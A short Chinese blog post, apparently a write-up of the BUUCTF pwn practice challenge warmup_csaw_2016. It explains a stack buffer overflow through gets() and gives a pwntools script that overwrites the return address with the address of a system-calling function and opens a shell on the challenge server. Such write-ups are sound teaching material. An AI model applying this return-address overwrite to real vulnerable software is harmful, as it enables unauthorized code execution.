[buuctf pwn]warmup_csaw_2016

checksec一下,64位,没开栈溢出保护,可以利用

image-20240717102333679

进入ida,有个gets能利用,然后v5的大小是64

image-20240717102741412

然后看见一个40060D函数,是可以利用的system函数

image-20240717102902684

image-20240717102910708

所以用64+8填满缓冲区和rbp,然后接400611这个地址

from pwn import *
p=remote('node5.buuoj.cn',26240)
p.sendline(b'A'*72 + p64(0x400611))
p.interactive()

运行结果如下

image-20240717103103108

posted @ 2024-07-17 10:31  yee-l  阅读(108)  评论(0)    收藏  举报